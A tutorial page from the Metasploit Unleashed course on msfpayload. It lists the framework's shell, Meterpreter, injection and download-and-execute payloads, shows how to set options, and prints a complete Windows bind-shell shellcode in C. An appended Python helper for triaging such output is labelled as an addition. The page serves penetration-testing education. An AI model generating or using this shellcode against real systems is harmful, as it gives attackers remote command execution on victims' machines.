Msfpayload
From Metasploit Unleashed - Mastering The Framework
msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.
This tool has many different options and variables available to it, but they may not all be fully realized given the limited output in the help banner.
    root@bt:~# msfpayload -h

        Usage: /pentest/exploits/framework3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

    OPTIONS:

        -h        Help banner
        -l        List available payloads
The power of this tool becomes clear from the vast number of different types of shellcode that are available to be customized for your specific exploit:
    root@bt:~# msfpayload -l

    Framework Payloads (222 total)
    ==============================

    Name  Description
    ----  -----------
    aix/ppc/shell_bind_tcp  Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port  Spawn a shell on an established connection
    aix/ppc/shell_interact  Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    bsd/sparc/shell_bind_tcp  Listen for a connection and spawn a command shell
    bsd/sparc/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    bsd/x86/exec  Execute an arbitrary command
    bsd/x86/metsvc_bind_tcp  Stub payload for interacting with a Meterpreter Service
    bsd/x86/metsvc_reverse_tcp  Stub payload for interacting with a Meterpreter Service
    bsd/x86/shell/bind_tcp  Listen for a connection, Spawn a command shell (staged)
    bsd/x86/shell/find_tag  Use an established connection, Spawn a command shell (staged)
    bsd/x86/shell/reverse_tcp  Connect back to the attacker, Spawn a command shell (staged)
    bsd/x86/shell_bind_tcp  Listen for a connection and spawn a command shell
    bsd/x86/shell_find_port  Spawn a shell on an established connection
    bsd/x86/shell_find_tag  Spawn a shell on an established connection (proxy/nat safe)
    bsd/x86/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    bsdi/x86/shell/bind_tcp  Listen for a connection, Spawn a command shell (staged)
    bsdi/x86/shell/reverse_tcp  Connect back to the attacker, Spawn a command shell (staged)
    bsdi/x86/shell_bind_tcp  Listen for a connection and spawn a command shell
    bsdi/x86/shell_find_port  Spawn a shell on an established connection
    bsdi/x86/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    cmd/unix/bind_inetd  Listen for a connection and spawn a command shell (persistent)
    cmd/unix/bind_netcat  Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_perl  Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_ruby  Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/generic  Executes the supplied command
    cmd/unix/interact  Interacts with a shell on an established socket connection
    cmd/unix/reverse  Creates an interactive shell through two inbound connections
    cmd/unix/reverse_bash  Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
    cmd/unix/reverse_netcat  Creates an interactive shell via netcat
    cmd/unix/reverse_perl  Creates an interactive shell via perl
    cmd/unix/reverse_ruby  Connect back and create a command shell via Ruby
    cmd/windows/adduser  Create a new user and add them to local administration group
    cmd/windows/bind_perl  Listen for a connection and spawn a command shell via perl (persistent)
    cmd/windows/bind_ruby  Continually listen for a connection and spawn a command shell via Ruby
    cmd/windows/download_exec_vbs  Download an EXE from an HTTP(S) URL and execute it
    cmd/windows/reverse_perl  Creates an interactive shell via perl
    cmd/windows/reverse_ruby  Connect back and create a command shell via Ruby
    generic/debug_trap  Generate a debug trap in the target process
    generic/shell_bind_tcp  Listen for a connection and spawn a command shell
    generic/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    generic/tight_loop  Generate a tight loop in the target process
    java/jsp_shell_bind_tcp  Listen for a connection and spawn a command shell
    java/jsp_shell_reverse_tcp  Connect back to attacker and spawn a command shell
    java/meterpreter/bind_tcp  Listen for a connection, Run a meterpreter server in Java
    java/meterpreter/reverse_tcp  Connect back stager, Run a meterpreter server in Java
    java/shell/bind_tcp  Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
    java/shell/reverse_tcp  Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
    linux/armle/adduser  Create a new user with UID 0
    linux/armle/exec  Execute an arbitrary command
    linux/armle/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    linux/mipsbe/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    linux/mipsle/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    linux/ppc/shell_bind_tcp  Listen for a connection and spawn a command shell
    linux/ppc/shell_find_port  Spawn a shell on an established connection
    linux/ppc/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    linux/ppc64/shell_bind_tcp  Listen for a connection and spawn a command shell
    linux/ppc64/shell_find_port  Spawn a shell on an established connection
    linux/ppc64/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    linux/x64/exec  Execute an arbitrary command
    linux/x64/shell/bind_tcp  Listen for a connection, Spawn a command shell (staged)
    linux/x64/shell/reverse_tcp  Connect back to the attacker, Spawn a command shell (staged)
    linux/x64/shell_bind_tcp  Listen for a connection and spawn a command shell
    linux/x64/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    linux/x86/adduser  Create a new user with UID 0
    linux/x86/chmod  Runs chmod on specified file with specified mode
    linux/x86/exec  Execute an arbitrary command
    linux/x86/meterpreter/bind_ipv6_tcp  Listen for a connection over IPv6, Staged meterpreter server
    linux/x86/meterpreter/bind_tcp  Listen for a connection, Staged meterpreter server
    linux/x86/meterpreter/find_tag  Use an established connection, Staged meterpreter server
    linux/x86/meterpreter/reverse_ipv6_tcp  Connect back to attacker over IPv6, Staged meterpreter server
    linux/x86/meterpreter/reverse_tcp  Connect back to the attacker, Staged meterpreter server
    linux/x86/metsvc_bind_tcp  Stub payload for interacting with a Meterpreter Service
    linux/x86/metsvc_reverse_tcp  Stub payload for interacting with a Meterpreter Service
    linux/x86/shell/bind_ipv6_tcp  Listen for a connection over IPv6, Spawn a command shell (staged)
    linux/x86/shell/bind_tcp  Listen for a connection, Spawn a command shell (staged)
    linux/x86/shell/find_tag  Use an established connection, Spawn a command shell (staged)
    linux/x86/shell/reverse_ipv6_tcp  Connect back to attacker over IPv6, Spawn a command shell (staged)
    linux/x86/shell/reverse_tcp  Connect back to the attacker, Spawn a command shell (staged)
    linux/x86/shell_bind_ipv6_tcp  Listen for a connection over IPv6 and spawn a command shell
    linux/x86/shell_bind_tcp  Listen for a connection and spawn a command shell
    linux/x86/shell_find_port  Spawn a shell on an established connection
    linux/x86/shell_find_tag  Spawn a shell on an established connection (proxy/nat safe)
    linux/x86/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    linux/x86/shell_reverse_tcp2  Connect back to attacker and spawn a command shell
    netware/shell/reverse_tcp  Connect back to the attacker, Connect to the NetWare console (staged)
    osx/armle/execute/bind_tcp  Listen for a connection, Spawn a command shell (staged)
    osx/armle/execute/reverse_tcp  Connect back to the attacker, Spawn a command shell (staged)
    osx/armle/shell/bind_tcp  Listen for a connection, Spawn a command shell (staged)
    osx/armle/shell/reverse_tcp  Connect back to the attacker, Spawn a command shell (staged)
    osx/armle/shell_bind_tcp  Listen for a connection and spawn a command shell
    osx/armle/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    osx/armle/vibrate  Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller.
    osx/ppc/shell/bind_tcp  Listen for a connection, Spawn a command shell (staged)
    osx/ppc/shell/find_tag  Use an established connection, Spawn a command shell (staged)
    osx/ppc/shell/reverse_tcp  Connect back to the attacker, Spawn a command shell (staged)
    osx/ppc/shell_bind_tcp  Listen for a connection and spawn a command shell
    osx/ppc/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    osx/x86/bundleinject/bind_tcp  Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
    osx/x86/bundleinject/reverse_tcp  Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
    osx/x86/exec  Execute an arbitrary command
    osx/x86/isight/bind_tcp  Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
    osx/x86/isight/reverse_tcp  Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
    osx/x86/shell_bind_tcp  Listen for a connection and spawn a command shell
    osx/x86/shell_find_port  Spawn a shell on an established connection
    osx/x86/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    osx/x86/vforkshell/bind_tcp  Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
    osx/x86/vforkshell/reverse_tcp  Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
    osx/x86/vforkshell_bind_tcp  Listen for a connection, vfork if necessary, and spawn a command shell
    osx/x86/vforkshell_reverse_tcp  Connect back to attacker, vfork if necessary, and spawn a command shell
    php/bind_perl  Listen for a connection and spawn a command shell via perl (persistent)
    php/bind_php  Listen for a connection and spawn a command shell via php
    php/download_exec  Download an EXE from an HTTP URL and execute it
    php/exec  Execute a single system command
    php/meterpreter/bind_tcp  Listen for a connection, Run a meterpreter server in PHP
    php/meterpreter/reverse_tcp  Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
    php/meterpreter_reverse_tcp  Connect back to attacker and spawn a Meterpreter server (PHP)
    php/reverse_perl  Creates an interactive shell via perl
    php/reverse_php  Reverse PHP connect back shell with checks for disabled functions
    php/shell_findsock  Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.
    solaris/sparc/shell_bind_tcp  Listen for a connection and spawn a command shell
    solaris/sparc/shell_find_port  Spawn a shell on an established connection
    solaris/sparc/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    solaris/x86/shell_bind_tcp  Listen for a connection and spawn a command shell
    solaris/x86/shell_find_port  Spawn a shell on an established connection
    solaris/x86/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    tty/unix/interact  Interacts with a TTY on an established socket connection
    windows/adduser  Create a new user and add them to local administration group
    windows/dllinject/bind_ipv6_tcp  Listen for a connection over IPv6, Inject a Dll via a reflective loader
    windows/dllinject/bind_nonx_tcp  Listen for a connection (No NX), Inject a Dll via a reflective loader
    windows/dllinject/bind_tcp  Listen for a connection, Inject a Dll via a reflective loader
    windows/dllinject/find_tag  Use an established connection, Inject a Dll via a reflective loader
    windows/dllinject/reverse_http  Tunnel communication over HTTP using IE 6, Inject a Dll via a reflective loader
    windows/dllinject/reverse_ipv6_tcp  Connect back to the attacker over IPv6, Inject a Dll via a reflective loader
    windows/dllinject/reverse_nonx_tcp  Connect back to the attacker (No NX), Inject a Dll via a reflective loader
    windows/dllinject/reverse_ord_tcp  Connect back to the attacker, Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp  Connect back to the attacker, Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp_dns  Connect back to the attacker, Inject a Dll via a reflective loader
    windows/download_exec  Download an EXE from an HTTP URL and execute it
    windows/exec  Execute an arbitrary command
    windows/messagebox  Spawns a dialog via MessageBox using a customizable title, text & icon
    windows/meterpreter/bind_ipv6_tcp  Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/bind_nonx_tcp  Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/bind_tcp  Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/find_tag  Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_http  Tunnel communication over HTTP using IE 6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_https  Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_ipv6_tcp  Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_nonx_tcp  Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_ord_tcp  Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp  Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp_dns  Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/metsvc_bind_tcp  Stub payload for interacting with a Meterpreter Service
    windows/metsvc_reverse_tcp  Stub payload for interacting with a Meterpreter Service
    windows/patchupdllinject/bind_ipv6_tcp  Listen for a connection over IPv6, Inject a custom DLL into the exploited process
    windows/patchupdllinject/bind_nonx_tcp  Listen for a connection (No NX), Inject a custom DLL into the exploited process
    windows/patchupdllinject/bind_tcp  Listen for a connection, Inject a custom DLL into the exploited process
    windows/patchupdllinject/find_tag  Use an established connection, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_ipv6_tcp  Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_nonx_tcp  Connect back to the attacker (No NX), Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_ord_tcp  Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp  Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp_dns  Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupmeterpreter/bind_ipv6_tcp  Listen for a connection over IPv6, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/bind_nonx_tcp  Listen for a connection (No NX), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/bind_tcp  Listen for a connection, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/find_tag  Use an established connection, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_ipv6_tcp  Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_nonx_tcp  Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_ord_tcp  Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp  Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp_dns  Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/shell/bind_ipv6_tcp  Listen for a connection over IPv6, Spawn a piped command shell (staged)
    windows/shell/bind_nonx_tcp  Listen for a connection (No NX), Spawn a piped command shell (staged)
    windows/shell/bind_tcp  Listen for a connection, Spawn a piped command shell (staged)
    windows/shell/find_tag  Use an established connection, Spawn a piped command shell (staged)
    windows/shell/reverse_http  Tunnel communication over HTTP using IE 6, Spawn a piped command shell (staged)
    windows/shell/reverse_ipv6_tcp  Connect back to the attacker over IPv6, Spawn a piped command shell (staged)
    windows/shell/reverse_nonx_tcp  Connect back to the attacker (No NX), Spawn a piped command shell (staged)
    windows/shell/reverse_ord_tcp  Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell/reverse_tcp  Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged)
    windows/shell/reverse_tcp_dns  Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell_bind_tcp  Listen for a connection and spawn a command shell
    windows/shell_bind_tcp_xpfw  Disable the Windows ICF, then listen for a connection and spawn a command shell
    windows/shell_reverse_tcp  Connect back to attacker and spawn a command shell
    windows/speak_pwned  Causes the target to say "You Got Pwned" via the Windows Speech API
    windows/upexec/bind_ipv6_tcp  Listen for a connection over IPv6, Uploads an executable and runs it (staged)
    windows/upexec/bind_nonx_tcp  Listen for a connection (No NX), Uploads an executable and runs it (staged)
    windows/upexec/bind_tcp  Listen for a connection, Uploads an executable and runs it (staged)
    windows/upexec/find_tag  Use an established connection, Uploads an executable and runs it (staged)
    windows/upexec/reverse_http  Tunnel communication over HTTP using IE 6, Uploads an executable and runs it (staged)
    windows/upexec/reverse_ipv6_tcp  Connect back to the attacker over IPv6, Uploads an executable and runs it (staged)
    windows/upexec/reverse_nonx_tcp  Connect back to the attacker (No NX), Uploads an executable and runs it (staged)
    windows/upexec/reverse_ord_tcp  Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp  Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp_dns  Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/vncinject/bind_ipv6_tcp  Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/bind_nonx_tcp  Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/bind_tcp  Listen for a connection, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/find_tag  Use an established connection, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_http  Tunnel communication over HTTP using IE 6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_ipv6_tcp  Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_nonx_tcp  Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_ord_tcp  Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp  Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp_dns  Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/x64/exec  Execute an arbitrary command (Windows x64)
    windows/x64/meterpreter/bind_tcp  Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
    windows/x64/meterpreter/reverse_tcp  Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
    windows/x64/shell/bind_tcp  Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell/reverse_tcp  Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell_bind_tcp  Listen for a connection and spawn a command shell (Windows x64)
    windows/x64/shell_reverse_tcp  Connect back to attacker and spawn a command shell (Windows x64)
    windows/x64/vncinject/bind_tcp  Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
    windows/x64/vncinject/reverse_tcp  Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
Once you have selected a payload, there are two switches that are used most often when crafting the payload for the exploit you are creating. In the example below we have selected a simple Windows bind shell. When we add the command-line argument "O" with that payload, we get all of the available configurable options for that payload.
    root@bt:~# msfpayload windows/shell_bind_tcp O

           Name: Windows Command Shell, Bind TCP Inline
         Module: payload/windows/shell_bind_tcp
        Version: 8642
       Platform: Windows
           Arch: x86
    Needs Admin: No
     Total size: 341
           Rank: Normal

    Provided by:
      vlad902
      sf

    Basic options:
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
    LPORT     4444             yes       The listen port
    RHOST                      no        The target address

    Description:
      Listen for a connection and spawn a command shell
As we can see from the output, this payload has three configurable options. For each one, the output shows whether it is required, its default setting (if any), and a short description:
- EXITFUNC
  - Required
  - Default setting: process
- LPORT
  - Required
  - Default setting: 4444
- RHOST
  - Not required
  - No default setting
Setting these options in msfpayload is very simple. An example is shown below of changing the exit technique and listening port of the shell:
    root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 O

           Name: Windows Command Shell, Bind TCP Inline
         Module: payload/windows/shell_bind_tcp
        Version: 8642
       Platform: Windows
           Arch: x86
    Needs Admin: No
     Total size: 341
           Rank: Normal

    Provided by:
      vlad902
      sf

    Basic options:
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
    LPORT     1234             yes       The listen port
    RHOST                      no        The target address

    Description:
      Listen for a connection and spawn a command shell
Now that all of that is configured, the only option left is to specify the output type such as C, Perl, Raw, etc. For this example we are going to output our shellcode as C:
    root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C
    /*
     * windows/shell_bind_tcp - 341 bytes
     * http://www.metasploit.com
     * LPORT=1234, RHOST=, EXITFUNC=seh, InitialAutoRunScript=,
     * AutoRunScript=
     */
    unsigned char buf[] =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
    "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
    "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
    "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
    "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
    "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
    "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
    "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
    "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
    "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
    "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
    "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
    "\x31\xdb\x53\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68"
    "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
    "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
    "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
    "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
    "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
    "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
    "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xfe\x0e\x32\xea"
    "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
    "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
Now we have our fully customized shellcode to be used in any exploit!
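The LPORT value set above is visible in the generated bytes, which is what an analyst checks when triaging a sample in this format. The following Python helper is an added example, not part of the original course text or of Metasploit: it parses the C output layout shown above and recovers the listening port from the `push` that builds the socket address. The function names and the `push imm32` heuristic are assumptions of this example, and the sample is only the header comment plus one array line from the output above.

```python
import re
import struct

# Excerpt of the C output shown above: the header comment plus the one array
# line that builds the socket address. The other 22 array lines are omitted,
# so the decoded size is intentionally smaller than the declared 341 bytes.
SAMPLE = r'''
/*
 * windows/shell_bind_tcp - 341 bytes
 * http://www.metasploit.com
 * LPORT=1234, RHOST=, EXITFUNC=seh, InitialAutoRunScript=,
 * AutoRunScript=
 */
unsigned char buf[] =
"\x31\xdb\x53\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68";
'''

HEADER_RE = re.compile(r"^\s*\*\s*(\S+) - (\d+) bytes", re.M)
OPTION_RE = re.compile(r"(\w+)=([^,\s]*)")
LITERAL_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')
# push imm32 (0x68) whose first two bytes are AF_INET (2, little-endian);
# the next two bytes are the port in network byte order. This is a heuristic
# for the x86 bind payload shown on this page, not a general signature.
SOCKADDR_PUSH_RE = re.compile(rb"\x68\x02\x00(..)", re.S)


def parse_c_output(text):
    """Return payload name, declared size, options and decoded bytes."""
    header = HEADER_RE.search(text)
    start, end = text.find("/*"), text.find("*/")
    comment = text[start:end] if 0 <= start < end else ""
    data = b"".join(
        bytes.fromhex(lit.replace("\\x", ""))
        for lit in LITERAL_RE.findall(text)
    )
    return {
        "payload": header.group(1) if header else None,
        "declared_size": int(header.group(2)) if header else None,
        "options": dict(OPTION_RE.findall(comment)),
        "data": data,
    }


def find_bind_ports(data):
    """Ports found in 'push <AF_INET, port>' instructions."""
    return [struct.unpack(">H", m.group(1))[0]
            for m in SOCKADDR_PUSH_RE.finditer(data)]


def triage(text):
    """Cross-check the header comment against the bytes themselves."""
    info = parse_c_output(text)
    ports = find_bind_ports(info["data"])
    lport = info["options"].get("LPORT", "")
    return {
        "payload": info["payload"],
        "complete": info["declared_size"] == len(info["data"]),
        "ports": ports,
        "header_matches_bytes": lport.isdigit() and int(lport) in ports,
    }


if __name__ == "__main__":
    print(triage(SAMPLE))
```

A mismatch between the header's LPORT and the port recovered from the bytes indicates that the comment or the array was changed after generation.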